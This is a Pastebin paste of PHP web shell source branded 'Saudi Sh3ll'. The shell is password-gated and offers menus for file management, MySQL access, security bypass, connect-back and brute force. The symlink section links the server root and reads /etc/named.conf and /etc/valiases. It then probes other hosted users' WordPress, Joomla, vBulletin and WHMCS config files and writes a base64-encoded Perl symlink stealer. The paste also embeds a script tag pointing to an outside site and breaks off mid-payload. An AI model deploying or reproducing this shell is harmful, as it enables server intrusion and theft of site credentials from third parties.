Guest User

Untitled

a guest
Jun 4th, 2018
252
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 85.70 KB | None | 0 0
  1. <?
  2. ob_start();
  3. ?>
  4.  
  5. <?php
  6. ########################################\
  7. # #
  8. # Cy_404 Sh3ll v1.0 #
  9. # #
  10. # By M4st3r L1nuxs3r #
  11. ########################################/
  12.  
  13.  
  14. $auth = 1;
  15. $name='9069923bfdb8c4fe34745f00267ab50e'; // khontol
  16. $pass='9069923bfdb8c4fe34745f00267ab50e'; // khontol
  17. if($auth == 1) {
  18. if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
  19. {
  20. header('WWW-Authenticate: Basic realm="Saudi Sh3ll v1.0"');
  21. header('HTTP/1.0 401 Unauthorized');
  22. exit("<b></b>");
  23. }
  24. }
  25. ?>
  26.  
  27.  
  28. <?
  29.  
  30.  
  31.  
  32.  
  33.  
  34.  
  35. @set_time_limit(0);
  36. @error_reporting(0);
  37.  
  38.  
  39. if ($_GET['sws']== 'phpinfo')
  40. {
  41.  
  42. echo @phpinfo();
  43.  
  44. exit;
  45.  
  46. }
  47.  
  48.  
  49.  
  50. echo '
  51.  
  52.  
  53. <title>'.$_SERVER['HTTP_HOST'].' ~ Saudi Sh3ll</title>
  54. <meta http-equiv="content=type" content="text/html; charset=utf-8" />
  55.  
  56.  
  57.  
  58.  
  59.  
  60. <style type="text/css">
  61. html,body {
  62. margin-top: 5px ;
  63. padding: 0;
  64. outline: 0;
  65. }
  66.  
  67.  
  68. body {
  69.  
  70. direction: ltr;
  71. background-color: #000000;
  72. color: #CCCCCC;
  73. font-family: Tahoma, Arial, sans-serif;
  74. font-weight: bold;
  75. text-align: center ;
  76. }
  77.  
  78. input,textarea,select{
  79. font-weight: bold;
  80. color: #FFFFFF;
  81. dashed #ffffff;
  82. border: 1px dotted #003300;
  83. background-color: black;
  84. padding: 3px
  85. }
  86.  
  87. input:hover{
  88. box-shadow:0px 0px 4px #009900;
  89.  
  90. }
  91. .cont a
  92.  
  93. {
  94.  
  95.  
  96. text-decoration: none;
  97. color: #FFFFFF;
  98.  
  99.  
  100.  
  101. }
  102. .hedr
  103. {
  104. font-size:32px;
  105. color: #009900;
  106. text-shadow: 0px 0px 4px #003300 ;
  107.  
  108.  
  109.  
  110. }
  111.  
  112.  
  113.  
  114. .td1{
  115.  
  116.  
  117. border: 1px dotted #022B04;
  118. padding: 8px;
  119. border-radius: 20px;
  120. text-shadow: 0px 0px 2px #003300;
  121. font-size: 10px;
  122. font-family: Tahoma;
  123. font-weight: bold;
  124.  
  125. }
  126.  
  127. .td1 tr{}
  128.  
  129. .lol{
  130. text-align: left;
  131. float: left;
  132. background: #990000;
  133. }
  134. .nop{
  135.  
  136. width: 180px;
  137. text-align: center;
  138. font-size: 15px;
  139. font-family:Tahoma;
  140. color: #003300;
  141.  
  142.  
  143.  
  144. }
  145. .nop a{
  146. text-decoration: none;
  147. color: #003300 ;
  148. text-shadow: none;
  149. width: 80px;
  150. padding: 8px
  151.  
  152.  
  153. }
  154. .nop a:hover{
  155. color: #FFFFFF;
  156. box-shadow: 0px 0px 4px #006600 ;
  157.  
  158.  
  159.  
  160. }
  161. a
  162. {
  163. text-decoration: none;
  164. color: #006600;
  165.  
  166. }
  167.  
  168.  
  169. .tmp tr td:hover{
  170.  
  171. box-shadow: 0px 0px 4px #EEEEEE;
  172.  
  173. }
  174. .fot{
  175.  
  176. font-family:Tahoma, Arial, sans-serif;
  177.  
  178. font-size: 13pt;
  179. }
  180.  
  181. .ir {
  182. color: #FF0000;
  183. }
  184.  
  185. .cont
  186. {
  187. float:right;
  188. color: #FFFFFF;
  189. box-shadow: 0px 0px 4px #003300;
  190. font-size: 13px;
  191. padding: 8px
  192.  
  193. }
  194.  
  195. .cont a{
  196.  
  197. text-decoration: none;
  198. color: #FFFFFF;
  199. font-family: Tahoma, Arial, sans-serif ;
  200. font-size: 13px;
  201. text-shadow: 0px 0px 3px ;
  202. }
  203.  
  204. .cont a:hover{
  205.  
  206.  
  207. color: #FF0000 ;
  208. text-shadow:0px 0px 3px #FF0000 ;
  209.  
  210.  
  211. }
  212.  
  213. .cont3
  214. {
  215. color: #FFFFFF;
  216. font-size: 15px;
  217. padding: 8px
  218.  
  219. }
  220.  
  221. .cont3 a{
  222.  
  223. text-decoration: none;
  224. color: #FFFFFF;
  225. font-family: Tahoma, Arial, sans-serif ;
  226. font-size: 15px;
  227. text-shadow: 0px 0px 3px ;
  228. }
  229.  
  230. .cont3 a:hover{
  231.  
  232.  
  233. color: #FF0000 ;
  234. text-shadow:0px 0px 3px #FF0000 ;
  235.  
  236.  
  237. }
  238.  
  239. .tmp tr td{
  240.  
  241. border: dotted 1px #003300;
  242.  
  243. padding: 4px ;
  244. font-size: 14px;
  245. }
  246.  
  247. .tmp tr td a {
  248. text-decoration: none;
  249.  
  250. }
  251. .cmd
  252. {
  253.  
  254. float:right;
  255.  
  256. }
  257. .tbm{
  258. font-size: 14px;
  259. }
  260.  
  261. .tbm tr td{
  262. border: dashed 1px #111111;
  263.  
  264. }
  265. .hr{
  266.  
  267. border: dotted 1px #003300;
  268. padding: 5px ;
  269. font-size: 13px;
  270. color: white ;
  271. text-shadow: 0px 0px 3px ;
  272. }
  273.  
  274. .hr2{
  275.  
  276. border: dotted 1px #003300;
  277. padding: 5px ;
  278. font-size: 13px;
  279. color: red ;
  280. text-shadow: 0px 0px 3px ;
  281. }
  282.  
  283. .t3p{
  284. width: 100%;
  285.  
  286. }
  287.  
  288. .t3p{margin-left: 45px ;}
  289.  
  290. .t33p{margin-left: 45px ;}
  291.  
  292.  
  293. .t3p tr td{
  294.  
  295. border: solid 1px #002F00;
  296. padding: 2px ;
  297. font-size: 13px;
  298. text-align: center ;
  299. font-weight: bold;
  300. margin-left: 20px ;
  301.  
  302. }
  303. .t3p tr td:hover{
  304.  
  305. box-shadow: 0px 0px 4px #009900;
  306.  
  307. }
  308.  
  309.  
  310. .info {margin-left: 100px ; }
  311.  
  312. .info tr td
  313. {
  314.  
  315. border: solid 1px #002F00;
  316. padding: 5px ;
  317. font-size: 13px;
  318. text-align: center ;
  319. font-weight: bold;
  320.  
  321.  
  322. }
  323. .conn{width: 70%;}
  324.  
  325. .conn tr td{
  326. border: 1px dashed #003300;
  327. padding: 5px ;
  328. font-size: 13px;
  329. text-align: center ;
  330. font-weight: bold;
  331.  
  332. }
  333.  
  334.  
  335. .lol a{
  336.  
  337. font-size: 10px;
  338.  
  339. }
  340.  
  341. .d0n{
  342. width: 90%;
  343. border-top: solid 1px #003300;
  344.  
  345. }
  346. .d0n tr td{
  347. font-weight: bold;
  348. color: #FFFFFF;
  349. font-family: Tahoma, Arial, sans-serif ;
  350. font-size: 13px;
  351. margin-left: 110px ;
  352.  
  353.  
  354. }
  355. .site
  356. {
  357.  
  358. font-weight: bold;
  359. width: 50%;
  360. box-shadow: 0px 0px 2px #003300;
  361.  
  362.  
  363. }
  364.  
  365. .ab
  366. {
  367. box-shadow: 0px 0px 6px #444444;
  368. width: 70%;
  369. padding: 10px ;
  370.  
  371. }
  372.  
  373. .ab tr td
  374. {
  375. text-align: center ;
  376. font-weight: bold;
  377. font-family: Tahoma, Arial, sans-serif ;
  378. font-size: 13px;
  379. color: white;
  380. text-shadow: 0px 0px 2px white ;
  381.  
  382.  
  383. }
  384. .ab tr td b
  385. {
  386. color:red ;
  387. text-shadow: 0px 0px 2px red ;
  388. }
  389. .ab tr td a
  390. {
  391. color: white;
  392. text-shadow: 0px 0px 2px white ;
  393.  
  394. }
  395. .ab tr td a:hover
  396. {
  397. color:#006600 ;
  398. text-shadow: none ;
  399. }
  400.  
  401. .bru
  402. {
  403. color: #FFFFFF;
  404. font-family: Tahoma, Arial, sans-serif ;
  405. font-size: 14px;
  406. text-shadow: 0px 0px 3px #000000 ;
  407.  
  408. }
  409.  
  410. .foter
  411. {
  412.  
  413. color: #003300;
  414. font-family: Tahoma, Arial, sans-serif ;
  415. font-size: 11px;
  416. text-shadow: 0px 0px 3px #000000 ;
  417.  
  418.  
  419. }
  420.  
  421.  
  422.  
  423.  
  424.  
  425.  
  426.  
  427. </style>
  428.  
  429. ';
  430.  
  431. echo '
  432.  
  433. <table width="95%" cellspacing="0" cellpadding="0" class="tb1" >
  434.  
  435. <td width="15%" valign="top" rowspan="2">
  436. <div class="hedr"> <img src="http://im11.gulfup.com/2012-02-03/1328267135241.png" align="left" alt="Saudi Shell" > </div>
  437. </td>
  438.  
  439. <td height="100" align="left" class="td1" >
  440.  
  441. ';
  442.  
  443. $pg = basename(__FILE__);
  444.  
  445. echo "OS : <b><font color=green>";
  446. $safe_mode = @ini_get('safe_mode');
  447. $dir = @getcwd();
  448. $ip=$_SERVER['REMOTE_ADDR'];
  449. $ips=$_SERVER['SERVER_ADDR'];
  450. define('SWS','al-swisre');
  451.  
  452. if ($os)
  453. {
  454.  
  455.  
  456. }
  457. else
  458. {
  459. $os = @php_uname();
  460. echo $os ;
  461. }
  462. echo "&nbsp;&nbsp;&nbsp;[ <a style='text-decoration: none; color: #003300; text-shadow: 2px 2px 7px #003300; ' target='_blank' href='http://www.google.com.sa/search?hl=ar&safe=active&client=firefox-a&hs=9Xx&rls=org.mozilla%3Aar%3Aofficial&q=$os&oq=$os&aq=f&aqi=&aql=&gs_sm=e&gs_upl=5759106l5781953l0l5782411l1l1l0l0l0l0l0l0ll0l0'>Google</a> ]";
  463. echo "&nbsp;&nbsp;&nbsp;[ <a style='text-decoration: none; color: #003300; text-shadow: 2px 2px 7px #003300; ' target='_blank' href='http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$os&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve='>exploit-db</a> ]";
  464. echo "</font><br /></b>";
  465.  
  466. echo (($safe_mode)?("safe_mode &nbsp;: <b><font color=red>ON</font></b>"):("safe_mode: <b><font color=green>OFF</font></b>"));
  467. echo "<br />disable_functions : ";
  468. if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{
  469.  
  470.  
  471. echo "<font color=red>$df</font></b>";
  472. <SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT>
  473. }
  474.  
  475. echo "<br />Server :&nbsp;<font color=green>".$_SERVER['SERVER_SOFTWARE']."</font><br>";
  476.  
  477. echo "PHP version : <b><font color=green>".@phpversion()."</font></b><br />";
  478.  
  479.  
  480. echo "Id : <font color=green><b>"."user = ".@get_current_user()." | uid= ".@getmyuid()." | gid= ".@getmygid()."</font></b><br />";
  481.  
  482. echo "Pwd : <font color=green><b>".$dir."&nbsp;&nbsp;".wsoPermsColor($dir)."</font></b>&nbsp;&nbsp;[ <a href='$pg'>Home</a> ]<br /><br /><br />";
  483.  
  484.  
  485. echo "Your ip :&nbsp;<font ><b><a style='text-decoration: none; color: #FF0000;' href='http://whatismyipaddress.com/ip/$ip' target='_blank' >$ip &nbsp;&nbsp;</a></font></b>
  486.  
  487. | ip server :&nbsp;<a style='text-decoration: none; color: #FF0000;' href='http://whatismyipaddress.com/ip/$ips' target='_blank' >$ips</a></font></b>
  488.  
  489. | &nbsp;<a style='text-decoration: none; color: #FF0000;' href='$pg?sws=site' target='_blank' >list site</a></font></b>
  490. | &nbsp;<a style='text-decoration: none; color: #FF0000;' href='?sws=phpinfo' target='_blank' >phpinfo</a></font></b> |";
  491.  
  492.  
  493.  
  494.  
  495.  
  496.  
  497.  
  498.  
  499.  
  500. echo "
  501. <br />
  502.  
  503.  
  504.  
  505.  
  506.  
  507.  
  508.  
  509.  
  510. </tr>
  511. </table>
  512.  
  513. <table cellspacing='0' cellpadding='0' style=' margin:9px'>
  514.  
  515. <tr>
  516. <td rowspan='2' class='td1' valign='top' >
  517.  
  518.  
  519. <div class='nop'>
  520.  
  521. <br /><a href='$pg' >File Manager</a> <br /> <br />
  522. <a href='$pg?sws=info' >More info</a> <br /><br />
  523. <a href='$pg?sws=ms' >Mysql Manager</a> <br /><br />
  524. <a href='$pg?sws=byp' >bypass Security</a> <br /><br />
  525. <a href='$pg?sws=sm' >Symlink</a> <br /><br />
  526. <a href='$pg?sws=con' >Connect Back</a> <br /><br />
  527. <a href='?sws=brt' >BruteForce</a> <br /><br />
  528. <a href='$pg?sws=ab' >About Por</a> <br />
  529.  
  530.  
  531.  
  532. </div>
  533.  
  534. ";
  535.  
  536.  
  537.  
  538.  
  539.  
  540. echo '
  541.  
  542. <td height="444" width="82%" align="center" valign="top">
  543.  
  544. ';
  545.  
  546.  
  547. if(isset($_REQUEST['sws']))
  548. {
  549.  
  550. switch ($_REQUEST['sws'])
  551. {
  552.  
  553.  
  554. ////////////////////////////////////////////////// Symlink //////////////////////////////////////
  555.  
  556. case 'sm':
  557.  
  558. $sws = 'al-swisre' ;
  559.  
  560. $mk = @mkdir('sym',0777);
  561.  
  562.  
  563.  
  564. $htcs = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  565. $f =@fopen ('sym/.htaccess','w');
  566.  
  567.  
  568. @fwrite($f , $htcs);
  569.  
  570.  
  571. $sym = @symlink("/","sym/root");
  572.  
  573.  
  574.  
  575.  
  576. $pg = basename(__FILE__);
  577.  
  578.  
  579.  
  580. echo '<div class="cont3">
  581. [ <a href="?sws=sm"> Symlink File </a>]
  582.  
  583. [<a href="?sws=sm&sy=sym"> User & Domains & Symlink </a>]
  584.  
  585. [<a href="?sws=sm&sy=sec"> Domains & Script </a>]
  586.  
  587. [ <a href="?sws=sm&sy=pl">Make Symlink Perl</a>]
  588. </div><br /><br />' ;
  589.  
  590. ////////////////////////////////// file ////////////////////////
  591. $sws = 'al-swisre' ;
  592.  
  593. if(isset($_REQUEST['sy']))
  594. {
  595.  
  596. switch ($_REQUEST['sy'])
  597. {
  598.  
  599.  
  600.  
  601.  
  602.  
  603. /// Domains + Scripts ///
  604.  
  605. case 'sec':
  606.  
  607.  
  608. $d00m = @file("/etc/named.conf");
  609.  
  610. if(!$d00m)
  611. {
  612. die (" can't read /etc/named.conf");
  613. }
  614. else
  615.  
  616. {
  617. echo "<div class='tmp'>
  618. <table align='center' width='40%'><td> Domains </td><td> Script </td>";
  619. foreach($d00m as $dom){
  620.  
  621. if(eregi("zone",$dom)){
  622.  
  623. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  624.  
  625. flush();
  626.  
  627. if(strlen(trim($domsws[1][0])) > 2){
  628.  
  629. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  630.  
  631. ///////////////////////////////////////////////////////////////////////////////////
  632.  
  633. $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
  634. $wpp=@get_headers($wpl);
  635. $wp=$wpp[0];
  636.  
  637. $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
  638. $wpp2=@get_headers($wp2);
  639. $wp12=$wpp2[0];
  640.  
  641. ///////////////////////////////
  642.  
  643. $jo1=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
  644. $joo=@get_headers($jo1);
  645. $jo=$joo[0];
  646.  
  647.  
  648. $jo2=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
  649. $joo2=@get_headers($jo2);
  650. $jo12=$joo2[0];
  651.  
  652. ////////////////////////////////
  653.  
  654. $vb1=$pageURL."/sym/root/home/".$user['name']."/public_html/includes/config.php";
  655. $vbb=@get_headers($vb1);
  656. $vb=$vbb[0];
  657.  
  658. $vb2=$pageURL."/sym/root/home/".$user['name']."/public_html/vb/includes/config.php";
  659. $vbb2=@get_headers($vb2);
  660. $vb12=$vbb2[0];
  661.  
  662. $vb3=$pageURL."/sym/root/home/".$user['name']."/public_html/forum/includes/config.php";
  663. $vbb3=@get_headers($vb3);
  664. $vb13=$vbb3[0];
  665.  
  666. /////////////////
  667.  
  668. $wh1=$pageURL."/sym/root/home/".$user['name']."public_html/clients/configuration.php";
  669. $whh2=@get_headers($wh1);
  670. $wh=$whh2[0];
  671.  
  672. $wh2=$pageURL."/sym/root/home/".$user['name']."/public_html/support/configuration.php";
  673. $whh2=@get_headers($wh2);
  674. $wh12=$whh2[0];
  675.  
  676. $wh3=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
  677. $whh3=@get_headers($wh3);
  678. $wh13=$whh3[0];
  679.  
  680. $wh5=$pageURL."/sym/root/home/".$user['name']."/public_html/submitticket.php";
  681. $whh5=@get_headers($wh5);
  682. $wh15=$whh5[0];
  683.  
  684. $wh4=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
  685. $whh4=@get_headers($wh4);
  686. $wh14=$whh4[0];
  687.  
  688.  
  689.  
  690. ////////////////////////////////////////////////////////////////////////////////
  691.  
  692. ////////// Wordpress ////////////
  693.  
  694. $pos = strpos($wp, "200");
  695. $config="&nbsp;";
  696.  
  697. if (strpos($wp, "200") == true )
  698. {
  699. $config="<a href='".$wpl."' target='_blank'>Wordpress</a>";
  700. }
  701. elseif (strpos($wp12, "200") == true)
  702. {
  703. $config="<a href='".$wp2."' target='_blank'>Wordpress</a>";
  704. }
  705.  
  706. ///////////WHMCS////////
  707.  
  708. elseif (strpos($jo, "200") == true and strpos($wh15, "200") == true )
  709. {
  710. $config=" <a href='".$wh5."' target='_blank'>WHMCS</a>";
  711.  
  712. }
  713. elseif (strpos($wh12, "200") == true)
  714. {
  715. $config =" <a href='".$wh2."' target='_blank'>WHMCS</a>";
  716. }
  717.  
  718. elseif (strpos($wh13, "200") == true)
  719. {
  720. $config =" <a href='".$wh3."' target='_blank'>WHMCS</a>";
  721.  
  722. }
  723.  
  724. ///////// Joomla to 4 ///////////
  725.  
  726. elseif (strpos($jo, "200") == true)
  727. {
  728. $config=" <a href='".$jo1."' target='_blank'>Joomla</a>";
  729. }
  730.  
  731. elseif (strpos($jo12, "200") == true)
  732. {
  733. $config=" <a href='".$jo2."' target='_blank'>Joomla</a>";
  734. }
  735.  
  736. //////////vBulletin to 4 ///////////
  737.  
  738. elseif (strpos($vb, "200") == true)
  739. {
  740. $config=" <a href='".$vb1."' target='_blank'>vBulletin</a>";
  741. }
  742.  
  743. elseif (strpos($vb12, "200") == true)
  744. {
  745. $config=" <a href='".$vb2."' target='_blank'>vBulletin</a>";
  746. }
  747.  
  748. elseif (strpos($vb13, "200") == true)
  749. {
  750. $config=" <a href='".$vb3."' target='_blank'>vBulletin</a>";
  751. }
  752.  
  753. else
  754. {
  755. continue;
  756. }
  757.  
  758. /////////////////////////////////////////////////////////////////////////////////////
  759.  
  760.  
  761.  
  762. $site = $user['name'] ;
  763.  
  764.  
  765.  
  766.  
  767. echo "<tr><td><a href=http://www.".$domsws[1][0]."/>".$domsws[1][0]."</a></td>
  768. <td>".$config."</td></tr>"; flush();
  769. exit;
  770.  
  771. }
  772. }
  773. }
  774. }
  775.  
  776.  
  777.  
  778.  
  779. break;
  780.  
  781.  
  782. /// user + domine + symlink ///
  783.  
  784. case 'sym':
  785.  
  786. $d00m = @file("/etc/named.conf");
  787.  
  788. if(!$d00m)
  789. {
  790. die (" can't read /etc/named.conf");
  791. }
  792. else
  793.  
  794. {
  795. echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
  796. foreach($d00m as $dom){
  797.  
  798. if(eregi("zone",$dom)){
  799.  
  800. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  801.  
  802. flush();
  803.  
  804. if(strlen(trim($domsws[1][0])) > 2){
  805.  
  806. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  807.  
  808.  
  809.  
  810. $site = $user['name'] ;
  811.  
  812.  
  813. @symlink("/","sym/root");
  814.  
  815. $site = $domsws[1][0];
  816.  
  817. $ir = 'ir';
  818.  
  819. $il = 'il';
  820.  
  821. if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) )
  822. {
  823. $site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$domsws[1][0]."</div>";
  824. }
  825.  
  826.  
  827. echo "
  828. <tr>
  829.  
  830. <td>
  831. <div class='dom'><a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a> </div>
  832. </td>
  833.  
  834.  
  835. <td>
  836. ".$user['name']."
  837. </td>
  838.  
  839.  
  840.  
  841.  
  842.  
  843.  
  844. <td>
  845. <a href='sym/root/home/".$user['name']."/public_html' target='_blank'>symlink </a>
  846. </td>
  847.  
  848.  
  849. </tr></div> ";
  850.  
  851.  
  852. flush();
  853.  
  854. }
  855. }
  856. }
  857. }
  858.  
  859.  
  860.  
  861.  
  862. break;
  863.  
  864. case 'pl':
  865.  
  866. if (!is_dir('sa2')){
  867.  
  868. $mk = @mkdir('sa2',0777);
  869.  
  870.  
  871.  
  872. if (is_file('sa2/perl.pl'))
  873. {
  874.  
  875.  
  876. echo "<a href='sa2/perl.pl' target='_blank'>Symlink Perl</a>";
  877.  
  878.  
  879. @chmod('sa2/perl.pl',0755);
  880.  
  881.  
  882.  
  883.  
  884. }
  885. else
  886. {
  887.  
  888.  
  889.  
  890.  
  891. $f2 =@fopen ('sa2/perl.pl','w');
  892.  
  893.  
  894. $sml_perl = "IyEvdXNyL2Jpbi9wZXJsIC1JL2hvbWUvYWxqbm9mcWUvcHVibGljX2h0bWwvdHJhZmlxL2dvbmZpZy5wbA0KcHJpbnQgIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sXG5cbiI7DQpwcmludCc8IURPQ1RZUEUgaHRtbCBQVUJMSUMgIi0vL1czQy8vRFREIFhIVE1MIDEuMCBUcmFuc2l0aW9uYWwvL0VOIiAiaHR0cDovL3d3dy53My5vcmcvVFIveGh0bWwxL0RURC94aHRtbDEtdHJhbnNpdGlvbmFsLmR0ZCI+DQo8aHRtbCB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94aHRtbCI+DQo8aGVhZD4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtTGFuZ3VhZ2UiIGNvbnRlbnQ9ImVuLXVzIiAvPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgiIC8+DQo8dGl0bGU+W35dIFBhaW4gU3ltbGluazwvdGl0bGU+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KLm5ld1N0eWxlMSB7DQogZm9udC1mYW1pbHk6IFRhaG9tYTsNCiBmb250LXNpemU6IHgtc21hbGw7DQogZm9udC13ZWlnaHQ6IGJvbGQ7DQogY29sb3I6ICMwMEZGRkY7DQogIHRleHQtYWxpZ246IGNlbnRlcjsNCn0NCjwvc3R5bGU+DQo8L2hlYWQ+DQonOw0Kc3ViIGxpbHsNCiAgICAoJHVzZXIpID0gQF87DQokbXNyID0gcXh7cHdkfTsNCiRrb2xhPSRtc3IuIi8iLiR1c2VyOw0KJGtvbGE9fnMvXG4vL2c7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdmIvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJ35+dkJ1bGxldGluMS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nfn52QnVsbGV0aW4yLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLid+fnZCdWxsZXRpbjMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2MvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJ35+dkJ1bGxldGluNC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWcucGhwJywka29sYS4nfn5QaHBiYjEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJ35+UGhwYmIyLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLid+fldvcmRwcmVzczEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nfn5Xb3JkcHJlc3MyLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5Kb29tbGExLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2Jsb2cvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid+fkpvb21sYTIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvam9vbWxhL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5Kb29tbGEzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htMS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5XaG0yLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3N1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid+fldobTMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5XaG00LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JpbGxpbmdzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5XaG01LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid+fldobTYudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htNy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jcy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htOC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9vcmRlci9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htOS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hZG1pbi9jb25mLnBocCcsJGtvbGEuJ35+NS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hZG1pbi9jb25maWcucGhwJywka29sYS4nfn40LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZfZ2xvYmFsLnBocCcsJGtvbGEuJ35+aW52aXNpby50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlL2RiLnBocCcsJGtvbGEuJ35+Ny50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25uZWN0LnBocCcsJGtvbGEuJ35+OC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ta19jb25mLnBocCcsJGtvbGEuJ35+bWstcG9ydGFsZTEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaW5jbHVkZS9jb25maWcucGhwJywka29sYS4nfn4xMi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zZXR0aW5ncy5waHAnLCRrb2xhLid+flNtZi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9mdW5jdGlvbnMucGhwJywka29sYS4nfn5waHBiYjMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaW5jbHVkZS9kYi5waHAnLCRrb2xhLid+fmluZmluaXR5LnR4dCcpOw0KfQ0KaWYgKCRFTlZ7J1JFUVVFU1RfTUVUSE9EJ30gZXEgJ1BPU1QnKSB7DQogIHJlYWQoU1RESU4sICRidWZmZXIsICRFTlZ7J0NPTlRFTlRfTEVOR1RIJ30pOw0KfSBlbHNlIHsNCiAgJGJ1ZmZlciA9ICRFTlZ7J1FVRVJZX1NUUklORyd9Ow0KfQ0KQHBhaXJzID0gc3BsaXQoLyYvLCAkYnVmZmVyKTs